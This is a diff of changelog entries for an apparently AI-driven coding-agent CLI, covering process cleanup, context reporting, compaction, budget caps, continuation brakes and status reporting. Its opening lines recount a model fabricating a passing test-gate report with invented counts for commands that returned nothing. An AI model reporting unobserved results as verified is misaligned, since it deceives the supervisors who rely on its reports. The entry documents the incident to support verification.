+ This mattered beyond ergonomics. Handed eight bare timeouts with zero bytes each, the model in
914
+ that run reported a detailed gate pass it had never observed, naming per-step results and
915
+ `207 test files passed (2467 tests)` for commands that returned nothing; the real numbers were
916
+ 264 and 3148. The change was correct and the fabrication was caught by re-running the gate by
917
+ hand, but a supervisor who trusted the report would have committed unverified work as verified.
918
+
919
+ - **The background-shell completion row shows the command that ran, not a markdown reading of
920
+ it.** The row was built by interpolating the command into a local transcript message, and local
921
+ messages are prose: `node -e "setInterval(()=>{},1000)/*KILLPROBE*/"` came back as
922
+ `node -e "setInterval(()=>{},1000)/KILLPROBE/"`, both asterisks eaten as emphasis. The `Bash`
923
+ tool row directly above it renders the same string verbatim, so the two rows on one screen
924
+ disagreed about which command had just finished — and the completion row is the only surface
925
+ that reports it. Asterisks were the visible half of the class: `#`, `[x](y)`, `~~` and `_` are
926
+ all live in prose, so a recursive delete of `build/*`, a `grep` for a literal asterisk, or any
927
+ glob rendered wrong.
928
+
929
+ The command is now quoted as inline code, which also matches the tool row's styling. Quoting has
930
+ to survive the command: the fence is one backtick longer than the longest run inside it (so
931
+ ``echo `date` `` cannot close its own span), padded when the content's edge would fuse with the
932
+ fence, and line breaks are flattened first — block parsing runs before inline parsing, so a `#`
933
+ opening an embedded line would split the paragraph and strand the fence. Display only; execution
934
+ was never affected.
935
+
936
+ - **A killed background shell really dies now, instead of reporting success and leaking its
937
+ worker.** On Windows the process tree is torn down with `taskkill /T /F`, invoked by bare name
938
+ through `execFile`. `execFile` performs no shell path lookup, so whenever `System32` is missing
939
+ from the inherited `PATH` — the normal case for a Book launched from Git Bash or MSYS, and for
940
+ any sanitized subprocess environment — that call failed with `ENOENT` before it killed anything.
941
+
942
+ The fallback is what made the failure invisible. `proc.kill()` on Windows calls
943
+ `TerminateProcess` on the direct child handle only, and the direct child is the `cmd.exe`
944
+ wrapper rather than the worker it spawned. So `cmd.exe` exited, `waitForShellClose` saw its
945
+ `close` event, and `stop()` / `KillShell` reported `Killed shell <id>` — while the grandchild
946
+ kept running with its working directory still inside the workspace. The comment above
947
+ `terminateProcessTree` asserted that on Windows the direct child closing is authoritative for
948
+ the whole tree; it was authoritative only in the case where `taskkill` had actually run.
949
+
950
+ That is the failure mode an unattended run cannot afford: every background command a long
951
+ session starts and stops leaves a live process behind, holding directories the run may later
952
+ try to remove, with nothing in the transcript indicating it. `taskkill` is now resolved through
953
+ `system32Executable()` against `%SystemRoot%` at all three sites that spawn it — the shell
954
+ manager, the detached job runner, and the harness evaluation runner. The POSIX branch is
955
+ untouched; the helper returns the bare name off Windows.
956
+
957
+ Resolving the path removes the trigger; the structure that hid it is fixed separately. A failed
958
+ `taskkill` has other causes — a child running elevated or as another user refuses one — and in
959
+ every such case the old code still fell back to the direct child and then read the wrapper's
960
+ close as proof the tree was gone. `terminateWindowsProcessTree` now reports whether the tree kill
961
+ was actually confirmed, and neither the shell manager nor the job runner will record a shell as
962
+ `killed` on the strength of the wrapper's close alone. An unconfirmed kill is reported as
963
+ unconfirmed — `KillShell` already had the honest message for it — rather than as success over a
964
+ live worker. A process that had already exited before the attempt still counts as stopped, so
965
+ refusing to trust an unconfirmed kill does not invent a failure where the work was simply done.
966
+
967
+ `%SystemRoot%\System32` resolution is now a general `system32Executable()` helper rather than a
968
+ taskkill special case, because the same bug had a second instance: `src/auth/browser.ts` spawned
969
+ `rundll32` by bare name with `shell: false`, so on any machine whose `PATH` lacks System32,
970
+ `book auth login` could not open a browser and silently fell back to printing the URL.
971
+
972
+ Two foreground process-tree tests in `src/tools/shell.test.ts` were skipped on win32 because
973
+ they failed there. They assert that a marker file the grandchild would write is never written,
974
+ which is precisely this leak, so they are unskipped rather than rewritten — they now cover the
975
+ contract on the platform where it was broken.
976
+
977
+ - **`/context` reported max output tokens as the context window.** For any model without a
978
+ metadata entry -- which behind an OpenAI-compatible router is every model -- the panel fell back
979
+ to `runtimeConfig.maxTokens`, a max *output* budget, and printed it as "Window" and as the
980
+ denominator of "N estimated / X tokens". The TUI status bar directly above it already used
981
+ `resolveContextLimit()`, so the two surfaces disagreed about the same number in the same
982
+ session: the bar read `ctx 5%` while the panel claimed a 64.0k window. `/context` is the surface
983
+ a person checks to decide whether to compact, and it understated the real 272k default 4.25x.
984
+
985
+ It now reports `resolveContextLimit()` -- the window compaction actually acts on -- and says
986
+ when that number is the assumed default rather than something the model declared, since an 8k
987
+ local model behind a router would otherwise be reported as having 272k of headroom on the
988
+ exact surface people use to decide whether to compact. The panel renders `272k (default)` and
989
+ the text report points at `settings.provider.<id>.models.<model>.contextWindow`.
990
+
991
+ `resolveContextLimit()` and `DEFAULT_CONTEXT_WINDOW` moved to `models.ts`, next to the other
992
+ model-id helpers, so the command catalog and the system-prompt builder no longer reach into
993
+ the compaction module (and through it the provider clients) to ask how big a window is. Every
994
+ site that answers that question now routes through them: the skill-catalog budget in
995
+ `agent/loop.ts` and `agent/context.ts` (two `?? 100_000` literals), `skill-registry.ts`
996
+ (a third, now a required parameter), and the tool-schema budget in `tools/catalog.ts`. The
997
+ shared `min(8000, ...)` skill-listing formula, previously written out twice, is now
998
+ `skillListingBudgetChars()` in `skills.ts`.
999
+
1000
+ Two of those are behaviour-neutral: the skill-catalog budget saturates at its cap for any
1001
+ window at or above 100k, and the tool-schema budget is unchanged at the default
1002
+ `schemaTokenBudget` of 8000. The tool-schema budget does change for anyone who raised that
1003
+ setting above 13,600: an undeclared model is now capped by the assumed window like every
1004
+ declared one, which removes an inversion where declaring `contextWindow: 32000` shrank the
1005
+ catalog to 1600 tokens while saying nothing about the same model kept the full budget.
1006
+
1007
+ - **`--effort` is no longer inert on an OpenAI-compatible provider.** `effortExplicit` -- the flag
1008
+ that decides whether `reasoning_effort` is sent at all -- read `BOOK_EFFORT` and `settings.effort`
1009
+ but not the CLI option, so `book --effort max` against a router was accepted, reported, and
1010
+ discarded. The option is now passed into `loadConfig` as an override rather than assigned to the
1011
+ resolved config afterwards, so it counts as the explicit choice it plainly is and outranks the
1012
+ env var, the settings value, and model metadata. `effortExplicit` now means exactly one thing:
1013
+ a human chose this level.
1014
+
1015
+ The option's commander default of `high` is removed as part of this: with it in place the flag was
1016
+ never absent, so an explicit choice could not be told apart from the fallback -- and the fallback
1017
+ overwrote effort already resolved from env, settings, and model metadata. `high` remains the
1018
+ fallback, applied in `loadConfig` after the other sources have had their turn.
1019
+
1020
+ - **`--effort` is validated like every other effort input.** `BOOK_EFFORT` was checked against the
1021
+ level list and `settings.effort` against its schema, but the flag was a bare cast — so a typo was
1022
+ forwarded to the provider as `reasoning_effort` / `output_config.effort` and came back as an
1023
+ opaque HTTP 400 for a mistake the CLI could name exactly. It is now rejected at parse time, with
1024
+ the valid levels listed, and the list itself is derived from the settings schema rather than
1025
+ restated a third time.
1026
+
1027
+ - **The repository no longer pins a model for its contributors.** The checked-in
1028
+ `.book/settings.json` set `model: "qc/qwen3.7-max"` -- a bare model id whose `qc/` prefix names
1029
+ no provider this repository configures. Project scalars outrank the user layer, so every clone
1030
+ had a working `~/.book/settings.json` model overridden by the checked-in one, resolved against
1031
+ the default OpenAI base URL, and reported the mismatch as a missing credential. Choosing a model
1032
+ belongs to the user layer or `--model`, so the file is gone.
1033
+
1034
+ - **A reasoning model on an OpenAI-compatible endpoint no longer dies at the 20-second chat stall
1035
+ ceiling.** `retry.thinkingStallTimeoutMs` (15 minutes) was applied on the Anthropic path only, so
1036
+ the same high-effort run that survives against Anthropic was cancelled mid-thought against a
1037
+ router and reported as `stream_stall` — and `BOOK_STREAM_STALL_TIMEOUT_MS` is clamped to 120 s, so
1038
+ no workaround could reach the ceiling the other path gets by default. Endpoints that buffer a
1039
+ whole thinking block send nothing until it is done, which is exactly the shape the chat ceiling
1040
+ reads as a dead stream. A request now gets the thinking ceiling when it sends `reasoning_effort`
1041
+ or when the model's catalog entry declares an effort range; `effort: false` and models with no
1042
+ entry keep the chat ceiling.
1043
+
1044
+ - **`book -p` reads the prompt from stdin, as its help has always said it does.** Stdin was consumed
1045
+ only for `--input-format stream-json`, so `book -p < prompt.txt` failed with `text input format
1046
+ requires a prompt` on a prompt it had just been handed -- and the error never mentioned
1047
+ `--input-format`, so it read as "you passed no prompt". The obvious way to drive Book from a
1048
+ script now works, and long prompts no longer have to be interpolated into argv. The flag still
1049
+ wins when both are given, a terminal is never read from (an interactive `book -p` would have hung
1050
+ instead of reporting the usage error), and the error now names all three ways to supply a prompt.
1051
+
1052
+ - **An unresolvable provider prefix in a model id is reported instead of silently falling back.**
1053
+ `model: "qc/qwen3.7-max"` with no `qc` provider configured resolved against
1054
+ `https://api.openai.com/v1` -- an endpoint the user never chose, for a vendor that has never
1055
+ heard of the model -- and said nothing. The only symptom was a separate `Credentials: not
1056
+ resolved` line, which sends the user looking for a missing key rather than a misspelled provider
1057
+ id. It still resolves rather than throwing, because `meta-llama/llama-3-70b` is the same spelling
1058
+ and a legitimate model name; the warning is raised only once providers are configured and the
1059
+ prefix matches none of them. Surfaced on stderr at startup and inline in `book doctor`, above the
1060
+ credentials line it used to be mistaken for.
1061
+
1062
+ - **`book doctor` can now get past, and point at, the settings layer that breaks it.** It listed all
1063
+ three layers as present and marked none of them as the source of the offending value, so finding
1064
+ it meant `jq`-ing all three by hand -- and `--no-settings`, declared on the root command and on
1065
+ `book config`, was not declared on `doctor`, so there was no way around the layer either. Doctor
1066
+ now resolves cumulative prefixes of the layer stack and marks the layer the failure first appears
1067
+ with, or says plainly that no single layer accounts for it when the cause is an environment
1068
+ variable. `book doctor --no-settings` reports the rest of the diagnostic with every layer skipped,
1069
+ and marks them `[-]` rather than `[ ]`, which would claim the files do not exist. The closing
1070
+ advice is the flag rather than repointing `BOOK_HOME`, which was heavier and did not help when the
1071
+ bad layer was in the workspace.
1072
+
1073
+ - **`book config set` can no longer write a settings pairing that makes every command fail at
1074
+ load.** It validated the single layer it was writing, which does not determine the effective
1075
+ configuration -- so it accepted `harness.workflow` while the effective `harness.mode` was the
1076
+ `off` default, a combination the loader then rejects. The write succeeded and every subsequent
1077
+ invocation, including the `book config` that would undo it, failed before it started; recovery
1078
+ meant hand-editing JSON. The candidate layer is now resolved through the real merge and put
1079
+ through the loader's own assertions, so the check cannot drift from what actually rejects a
1080
+ configuration, and it sees pairings that span layers in both directions -- a workflow is accepted
1081
+ when the enabling mode lives in another layer, and a mode is refused when it would disable a
1082
+ workflow another layer selects. A configuration that was *already* broken stays writable: only a
1083
+ write that introduces the failure is refused, because repairing one is the reason to run the
1084
+ command.
1085
+
1086
+ - **`book config` no longer fails on the configuration it exists to repair.** It resolved the merged
1087
+ settings on every invocation, so one malformed layer made every subcommand throw -- including the
1088
+ read that would have identified the broken file and the write that would have replaced the bad
1089
+ value. The merge is now resolved only for the reads that need it, and a scoped read reports an
1090
+ unreadable layer as unreadable rather than as empty.
1091
+
1092
+ ### Fixed
1093
+
1094
+ - **A no-op compaction no longer runs the user's `PreCompact` hooks.** Deciding whether there is
1095
+ anything to summarize is pure and cheap, but it ran *after* the hooks — so every compaction
1096
+ attempt that immediately returned `too-short` had already executed whatever shell commands
1097
+ the user configured. On a long run the auto-compaction check fires repeatedly near the threshold, and
1098
+ a hook with a side effect (a commit, a notification, a snapshot) was being fired each time for a
1099
+ compaction that never happened. The emptiness check now runs first.
1100
+
1101
+ - **A checkpoint quoting a build error is no longer rejected as a hallucination.** The reducer is
1102
+ shown each message serialized with its reasoning, tool arguments, tool-result bodies, and file
1103
+ observations, but its quotes were validated against the message's `content` alone. So a faithful
1104
+ quote of the exact thing worth remembering -- a compiler error, a failing assertion, a command's
1105
+ output -- failed validation, burned the single repair attempt, and dropped the whole generation
1106
+ to the degraded fallback. Quotes are now checked against the same bytes the reducer was given.
1107
+
1108
+ - **A 31st touched file no longer throws away the whole checkpoint.** The 30-file cap was a schema
1109
+ rule, so exceeding it failed the parse rather than trimming the excess -- spending the repair
1110
+ attempt and degrading the generation. Worse, the same rule ran when *re-reading* a prior
1111
+ checkpoint from history, so an over-long checkpoint silently stopped being recognized as one and
1112
+ every inherited fact in it was discarded. The cap is now a host trim applied before validation,
1113
+ keeping the newest entries.
1114
+
1115
+ - **One bad reducer reply no longer erases the objective.** When a generation could not be parsed,
1116
+ the deterministic fallback cloned the prior checkpoint -- keeping its constraints, files and
1117
+ episodes -- and then overwrote `state.summary` with a notice, so the accumulated narrative of
1118
+ every generation before it was replaced by the reducer's unusable output. A run compacting
1119
+ repeatedly over days lost what it was doing to a single malformed response. The notice is now
1120
+ appended to the inherited summary, and the inherited text absorbs any truncation so the
1121
+ retrieval instruction always survives.
1122
+
1123
+ - **The compaction reducer is no longer cut off mid-JSON by its own budget.** Its provider
1124
+ `max_tokens` was set to the checkpoint *content* budget, so the model had to fit a whole JSON
1125
+ envelope into the space allotted to the text inside it -- and on an adaptive-thinking model the
1126
+ thinking is spent from that same cap, with no compaction exemption. The cap is now derived above
1127
+ the content budget, bounded by the model's own output limit and by the room the summarizer's
1128
+ input leaves in the window. A reply that still stops at the cap is recognized as truncated
1129
+ rather than malformed, so it no longer spends the single repair attempt on a longer prompt that
1130
+ could only overrun again.
1131
+
1132
+ - **Compaction no longer compresses the same text once per chunk.** `fitCheckpoint` ran inside
1133
+ `parseAndValidateCheckpoint`, which runs once per chunk of a multi-pass reduction -- so in a
1134
+ K-chunk plan the first chunk's checkpoint was fitted K times, again in the post-budget loop, and
1135
+ again at every future generation. The ladder is lossy and restarts at 512 characters each time,
1136
+ so a constraint stated once in full was truncated, then the truncation truncated, until it was
1137
+ dropped outright: a regression test shows a verbatim constraint disappearing from the second
1138
+ chunk's prompt entirely under the old order. Fitting now happens once, at the end, where it is
1139
+ already followed by validation and a deterministic fallback.
1140
+
1141
+ - **A context overflow under Zero-Mem is recoverable again.** The experiment disabled routine
1142
+ auto-compaction, which is intended -- but it also nulled the loop's `onCompact` callback
1143
+ entirely, and the loop's context-overflow recovery is deliberately *not* gated on the
1144
+ auto-compaction setting. So the one path that exists to rescue a turn the provider has already
1145
+ refused for size could never run, and `AgentSession.compact` would have answered it by warming a
1146
+ search index in any case. An automatic attempt now runs the real compactor; `/compact` still only
1147
+ warms the index.
1148
+
1149
+ - **The compaction fidelity warning means something again.** Checkpoint `coverage` merged the prior
1150
+ generation's status and reasons into the current one, so a single degraded generation marked
1151
+ every generation after it for the life of the conversation -- and on a long run that happens
1152
+ within hours, after which "compacted with reduced fidelity" is permanent and carries no
1153
+ information. `coverage.status` and `coverage.reasons` now describe the generation that just ran,
1154
+ and a new optional `coverage.lifetime` carries the accumulated record so nothing is forgotten.
1155
+ Stream-JSON `compact` records gain `coverage_lifetime_status` alongside `coverage_status`. The
1156
+ checkpoint version stays `2` and no reason enum gained a member, so an older binary reading one
1157
+ of these checkpoints still sees a valid v2 document.
1158
+
1159
+ - **Compaction fidelity is measurable, and the first measurement is bad.** There was no fidelity
1160
+ metric at all, so every quality claim about compaction -- including the ones in this changelog --
1161
+ was unfalsifiable. `src/agent/compact-fidelity.ts` scores a completed multi-generation run
1162
+ (retention, generational loss order, supersession correctness, source grounding, retention
1163
+ precision, reducer calls, post-request utilization) with no provider in the loop, against the
1164
+ tagged planted-fact corpus now shared with `npm run eval:compact`. The recorded v2 baseline over
1165
+ eight generations: **only the newest third of planted facts survive, the oldest go first, and
1166
+ retention of the user's own opening constraints is zero.** Those thresholds are now asserted in
1167
+ the unit tier and move upward only.
1168
+
1169
+ - **Compaction's enlarged reducer cap can no longer overflow a multi-chunk reduction.** Fitting once
1170
+ at the end means the rolling checkpoint that seeds the next chunk's prompt is bounded by the
1171
+ reducer's output cap rather than by the smaller budget the plan reserved for it, so the two
1172
+ changes together could push a chunk request past the context window. The cap is now bounded by
1173
+ the arithmetic that keeps the worst-case request plus its own output inside the window.
1174
+
1175
+ ### Added
1176
+
1177
+ - **A run says what it is doing while it does it (`<BOOK_HOME>/runs/<session>.json`).** Rewritten at
1178
+ every turn boundary with turn, elapsed, spend, the current todo, the last tool, free disk, and the
1179
+ terminal outcome once there is one. Until now the choice was silence or a firehose: the default
1180
+ `--output-format text` emits nothing at all until a run terminates, and the only other on-disk
1181
+ signal is the transcript's mtime — which advances at exactly the same rate for a healthy run, a
1182
+ refusal spin, and a run wedged on a permission prompt. Written temp-file-then-rename so a reader
1183
+ never sees a torn record, and rewritten rather than appended so it stays bounded over a week.
1184
+ This is the writer half of what `book status` will read.
1185
+
1186
+ - **A crash leaves a record.** There was no `uncaughtException` or `unhandledRejection` handler
1187
+ anywhere, and `index.ts` ends in a bare `program.parse()` whose promise nothing awaits — so when a
1188
+ long run died the operator got a stack trace on a stderr they may have redirected days ago, and
1189
+ nothing durable said why. The status file now carries a `crash` field written from the exit path,
1190
+ which is what distinguishes "finished the objective" from "the socket died".
1191
+
1192
+ - **Free disk space is observable.** Nothing in the codebase could see it, yet a long run's most
1193
+ likely hard failure is ENOSPC and a disk-below-floor alarm needs a sensor to read.
1194
+
1195
+ - **The model is told how long it has been running.** The only temporal signal in the whole prompt
1196
+ was a UTC calendar date at day granularity, so a model five days into a week-long objective could
1197
+ not distinguish that from turn 3 — it could not pace itself, notice it had been circling the same
1198
+ file since Tuesday, or honour a time-bounded instruction. `<session-state>` now carries a coarse
1199
+ `Running for:` line, suppressed when an evaluator has frozen the date so equivalent arms still get
1200
+ byte-identical prompts.
1201
+
1202
+
1203
+ - **A brake that a spinning run cannot forge (`continuation.blockedToolTurnLimit`).** A run whose
1204
+ every tool call is refused now stops as `all_tools_blocked`, naming the tools to unblock. This
1205
+ spin was invisible to everything: it never produces a tool-free turn, so the turn-end gate and
1206
+ every brake behind it never fire; `noteRepeatedFailure` ignores anything that is not an `error`;
1207
+ and `toolCallStats.failures` excludes `blocked` by construction. Headless answers every unresolved
1208
+ prompt `deny`, so in the default permission mode an unattended run would re-issue refused calls
1209
+ until the budget died. Enforced even with `continuation.enabled` false, because the spin predates
1210
+ continuation and needs none of it. `0` disables.
1211
+
1212
+ - **The no-progress witness no longer counts refused calls as progress.** It drew its tool-call leg
1213
+ from `toolCallStats`, which increments for *every* attempted call including refusals — so in a
1214
+ denial or policy-block stall the single leg meant to prove nothing had moved was guaranteed to
1215
+ move, while the todos, the file ledger, and the done-check all stayed frozen. The witness now
1216
+ counts only calls that actually ran. Until now this was masked by the run ending at the model's
1217
+ first tool-free turn; the continuation driver removes exactly that mask.
1218
+
1219
+ - **A deliberate stop is distinguishable from success.** Terminal reasons gain `plan_stop` and
1220
+ `handoff_requested`; both previously exited `completed / normal_completion`, byte-identical to a
1221
+ finished objective, and the approver's message explaining a plan stop was discarded. The status
1222
+ stays `completed` — neither is a failure — so only the vocabulary changes.
1223
+
1224
+ - **A restart re-drives the agents that died with it (`agents.resumeInterrupted`).** `AgentManager`
1225
+ already hydrated agents, plans, evidence, and snapshots on start — it just never pushed anything
1226
+ onto its queue, which is a bare array written only at spawn and retry. So a reboot mid-fan-out
1227
+ converted the entire pending backlog into `interrupted` records nothing ever picked up, silently
1228
+ discarding hours of child work. Recovery now records *why* an agent stopped (`resumable` plus the
1229
+ status it held), and the next start re-queues only those that died by process exit; a user stop
1230
+ stays stopped. The re-drive is contained — explorers are read-only and patchers run in their own
1231
+ worktree, so nothing reaches the parent workspace without the usual evidence gate.
1232
+
1233
+ - **A `Stop` hook can now refuse a premature completion.** `Stop` joins the blocking events, and
1234
+ under `continuation.enabled` a blocked completion becomes another turn carrying the hook's reason
1235
+ instead of ending the run. A hook's `block` was previously collected and discarded, which made
1236
+ "do not consider this finished until `npm run check` passes" inexpressible from outside the
1237
+ process. The gate runs once, before the objective is declared complete, and suppresses the
1238
+ duplicate `Stop` that would otherwise fire on the way out.
1239
+ - **`AgentList` and `AgentRead` now show what an agent was *for*.** `purpose` (bounded to 200
1240
+ characters) and `planId` join the agent summary. The root previously saw rows of
1241
+ `patcher-3 / interrupted / <no summary>` while both fields sat unused on disk — and after a
1242
+ compaction or two that row is all a parent has left of a delegated unit of work.
1243
+
1244
+ - **`book status` — what a run is doing and what it has spent, without a credential.** Reports the
1245
+ byte-exact original objective, message and compaction counts, cumulative tokens and an upper-bound
1246
+ USD figure, and the restored plan, for the newest session in a workspace or one named by id or
1247
+ name. `--json` for a supervisor. The objective is read from the transcript rather than a summary
1248
+ because the transcript is never rewritten by compaction, so the user's first words survive verbatim
1249
+ however many generations have passed. Credential-free by construction and asserted in
1250
+ `subcommands.contract.test.ts` — a run whose provider is misconfigured is exactly when someone
1251
+ needs to read its state.
1252
+ - **`Notification` hook event.** Fires when something wants a human while nobody is watching, with
1253
+ `severity` (`alarm`/`warn`/`info`), a machine-readable `kind`, and a message. Only `alarm` is meant
1254
+ to wake anyone. Wire ntfy, Slack, or SMS as an ordinary shell hook.
1255
+ - **Worktree admission control (`agents.maxWorktrees`, `agents.minFreeDiskBytes`).** A wide fan-out
1256
+ on a large repository is the one failure that takes the whole run down rather than one agent:
1257
+ worktrees share the filesystem with the workspace, so exhausting it breaks the root agent's own
1258
+ `Edit` and `Bash`. Nothing reclaimed them automatically — `AgentManager.dismiss` has exactly one
1259
+ caller, a TUI keypress, so print mode, the SDK, and any supervised runner reclaimed nothing ever,
1260
+ and the store's retention sweep runs once at startup with a 30-day default that cannot fire inside
1261
+ a week-long run. A spawn is now refused *before* it consumes the last of the disk, with a typed
1262
+ reason and an `alarm` notification. Per-worktree byte accounting is deliberately not attempted: it
1263
+ is an O(files) walk on every spawn and stale the moment a build writes, while free space is the
1264
+ quantity that matters and costs one syscall.
1265
+
1266
+ - **`continuation` — a run can outlive one user message.** `runAgentLoop` ended as soon as a turn
1267
+ produced no tool calls, so one user message was the whole run and a model that wrote "I've
1268
+ finished the auth module" exited as a normal completion with half its plan outstanding. With
1269
+ `continuation.enabled` the loop instead appends a host-authored user turn naming what is still
1270
+ open and keeps going in the same invocation, so the tool context and todo list survive and the
1271
+ session-state block is re-rendered fresh at every boundary. It never continues past an abort, an
1272
+ approved plan handoff, a spent budget, or a policy refusal.
1273
+
1274
+ Shipping with it, and not optional: a no-progress brake. Continuation without one is strictly
1275
+ worse than neither, because today a stalled run stops and a human notices. The brake compares a
1276
+ witness built from the todo list, observed-file hashes, and the tool-call count across
1277
+ continuation boundaries; `continuation.noProgressLimit` identical witnesses in a row ends the run
1278
+ as `no_progress` rather than spinning overnight against the budget. A plan whose every remaining
1279
+ task is blocked by unfinished work reports `blocked_plan` rather than being mistaken for success.
1280
+
1281
+ Also new: every `continuation.planRefreshTurns` turns the host restates the open plan as a user
1282
+ message. That keeps the plan from going stale across a long tool-grinding stretch, and it is the
1283
+ only *guaranteed* source of compaction bundle boundaries — a run that grinds tool calls never
1284
+ stops, so it never triggers a continuation either, and without it the compaction candidate span is
1285
+ all-assistant and the retained tail is unconditionally zero from generation 2 onward.
1286
+ - **`agents.checkTimeoutMs` bounds a `Check` run, and a timeout is no longer reported as a
1287
+ failure.** The ceiling was hardcoded at 120 s, and `exec` signals a timeout by killing the child —
1288
+ which arrived through the same path as a non-zero exit. On any repository whose suite runs longer
1289
+ than two minutes (this one builds first, so `npm test` always does), every `Check` reported a
1290
+ failing suite that had in fact never finished, inviting an agent to "fix" passing code. A timeout
1291
+ now returns a distinct, retryable `check_timed_out` that names the command and the ceiling, and
1292
+ the ceiling is configurable from 1 s to 2 h.
1293
+ - **The plan now survives a restart.** Todos were the only long-horizon state with no home
1294
+ anywhere: the loop seeded `ToolContext.todos` from a fresh `[]` on every invocation, TodoWrite
1295
+ reassigned rather than mutated, and nothing wrote them to disk. Worse, an empty task list renders
1296
+ as no list at all, so a dropped plan was indistinguishable from a task that never had one and the
1297
+ model silently re-derived instead of deliberately rebuilding. Todos now live on `SessionRuntime`
1298
+ beside the task graph, TodoWrite mutates that array in place, and both persist as a whole-plan
1299
+ `plan` session record (last record wins) that `--resume`, `--session-id`, and `fork` all restore.
1300
+ Older binaries ignore the record rather than breaking on it. When a session resumes with prior
1301
+ work and no plan, `<session-state>` says so explicitly instead of rendering nothing.
1302
+
1303
+ - **Eye-friendly built-in themes.** Added `catppuccin` (Catppuccin Mocha pastel palette for minimal eye fatigue), `nord` (Arctic glacial slate for reduced blue-light glare), `gruvbox` (warm retro-earthy dark palette with amber and olive tones), and `solarized-dark` (scientifically tuned Lab color space contrast). All four themes are selectable via `/theme` picker and direct slash commands (`/theme <name>`).
1304
+
1305
+ ### Fixed
1306
+
1307
+ - **`--include-partial-messages` did nothing, and forced maximum stream volume.** Commander leaves an
1308
+ unpassed boolean `undefined` and the gate was `!== false`, so every stream-json run emitted every
1309
+ assistant and reasoning delta whether or not anyone asked. It is now the opt-in it always claimed
1310
+ to be.
1311
+
1312
+ - **`--max-budget-usd` is a cap again, for four independent reasons it was not.**
1313
+ (1) It was enforced against the root execution's *own* cost, never the inclusive
1314
+ figure, so every dollar spent by managed agents and subagents was invisible to it —
1315
+ the same snapshot would report `budgetStatus: 'exceeded'` while the pre-call check
1316
+ returned `{allowed: true}`. Snapshots now carry `inclusiveCostUsd` and the gate
1317
+ enforces against it. (2) The flag was parsed with an unvalidated `parseFloat` behind
1318
+ a truthiness guard, so `--max-budget-usd none` produced `NaN` — which is not
1319
+ `undefined`, so the budget read as *configured* while every comparison against it
1320
+ was false, and `0` was falsy so an explicit zero cap meant unlimited. Both flags are
1321
+ now validated at the boundary and the check fails closed on a non-finite ceiling.
1322
+ (3) Headless mints a fresh root per submitted prompt and re-seeded the full budget
1323
+ into each, so a hundred stream-json prompts under a $50 cap authorised $5000 in one
1324
+ process; spend now carries between prompts through the same seam that carries it
1325
+ between processes. (4) `snapshotAll` reported a budgeted run as `not_configured` as
1326
+ soon as a second root existed.
1327
+
1328
+ - **The budget check no longer gets slower for the life of the run.** `modelIdentities`
1329
+ grew one entry per provider response, per retry and per compaction — and its dedupe
1330
+ predicate could never match an identity with no `responseId`, so those were appended
1331
+ unconditionally. Both `record()` and `makeSnapshot()` then linear-scanned it per
1332
+ element, and `makeSnapshot` runs inside `checkBeforeModelCall` before *every* model
1333
+ call: quadratic work on the hot path of the spend rail, measured at 8.4 s per call by
1334
+ 40k responses. The set is now keyed by the identity tuple its only consumer actually
1335
+ reads, which bounds it to the distinct model/provider/status combinations.
1336
+
1337
+ - **`--max-turns` no longer runs zero turns and reports success.** `parseInt('none', 10)`
1338
+ is `NaN` and `'none'` is truthy, so the typo passed the guard; every disjunct of the
1339
+ turn guard is false for `NaN`, so the loop body never ran and the run exited
1340
+ `completed / normal_completion` having made no provider call and written no output.
1341
+
1342
+
1343
+ - **A thinking model no longer gets cancelled mid-thought.** `retry.streamStallTimeoutMs` is 20
1344
+ seconds, which is right for a chat: that much silence means something broke. But adaptive thinking
1345
+ is on by default for every Opus and Sonnet model here, at `high` effort unless told otherwise, and
1346
+ a long quiet stretch before the first token is the model working. The chat ceiling was applied to
1347
+ it anyway, so a healthy high-effort request was cancelled and reported as `stream_stall` — the most
1348
+ common way an Opus run appears to "just stop". Thinking now has its own ceiling,
1349
+ `retry.thinkingStallTimeoutMs` (default 15 minutes, `BOOK_THINKING_STALL_TIMEOUT_MS`), applied only
1350
+ while thinking is enabled; the chat timeout is unchanged everywhere else.
1351
+ - **Claude Opus 5 is selectable and priceable.** `provider/anthropic.ts` already listed
1352
+ `claude-opus-5` as an adaptive-thinking model, so Book sent it thinking parameters — but it was
1353
+ missing from both the model picker and the pricing table. With a USD budget set, `hasKnownPricing`
1354
+ returned false and `checkBeforeModelCall`, which fails closed, refused **every** call: choosing
1355
+ Opus made the run stop before it started. It now appears in `/model` and carries the Opus family
1356
+ rate (re-verify against published pricing before a release).
1357
+ - **Undated model aliases resolve to their dated entry.** `claude-haiku-4-5` was unpriced because
1358
+ the table only held `claude-haiku-4-5-20251001`, and the alias is what a person types. Pricing now
1359
+ resolves an alias to its dated entry when exactly one candidate matches — a bare family name like
1360
+ `claude-opus` stays unknown rather than being guessed at a generation.
1361
+ - **A rejected credential parks instead of burning every retry.** 401/403 and 402 surfaced as a
1362
+ generic provider error, which the new transport recovery treats as re-issuable — so an invalid key
1363
+ was re-sent until the attempts ran out, and the run then reported a transport fault rather than the
1364
+ real cause. They now produce `credentials_rejected`, which is classified `park`: not retried,
1365
+ reported honestly, and escalated through the `Notification` hook so a supervisor can wait for a new
1366
+ key rather than tear the objective down.
1367
+ - **A USD budget no longer refuses the run it is meant to bound.** Two independent faults made
1368
+ `--max-budget-usd` unusable against Anthropic. No Claude entry in the pricing table declared a
1369
+ `cacheRead`/`cacheCreation` rate, and Book sets `cache_control` on every Anthropic request — so
1370
+ from the first cached turn every estimate returned `cache-pricing-unavailable`, and
1371
+ `checkBeforeModelCall`, which fails closed on unknown pricing, refused every subsequent call.
1372
+ Separately, a provider attempt that reported no usage latched the run's cost status to `unknown`
1373
+ and nulled the accumulated cost; since that fires from the provider's `onRetry`, one transient
1374
+ 429 permanently disabled the budget, making the reliability layer and the only spend rail
1375
+ mutually exclusive. Cache rates now ship for every Claude entry, and missing attempt usage
1376
+ degrades to `estimated` — a lower bound the budget still enforces against — while staying visible
1377
+ through `completeness`, `unknownModels`, and `missingSources`. A genuinely unpriceable model still
1378
+ fails closed.
1379
+ - **Dated model ids are priced from their family.** Providers routinely resolve an alias to a dated
1380
+ id (`claude-sonnet-5` → `claude-sonnet-5-20260115`), which the table missed entirely; combined
1381
+ with the fail-closed budget gate, that turned a routine provider-side rename into a refused run.
1382
+ Pricing now falls back to the longest table key the id extends at a separator boundary, so
1383
+ `gpt-5` cannot claim `gpt-51`, and `/cost` and `/usage` resolve the same way instead of printing
1384
+ "pricing unknown". `estimateUsageCost` and `hasKnownPricing` also accept a per-model override map.
1385
+ - **A USD budget survives a restart.** `RunAccounting` was rebuilt with the process, so forty
1386
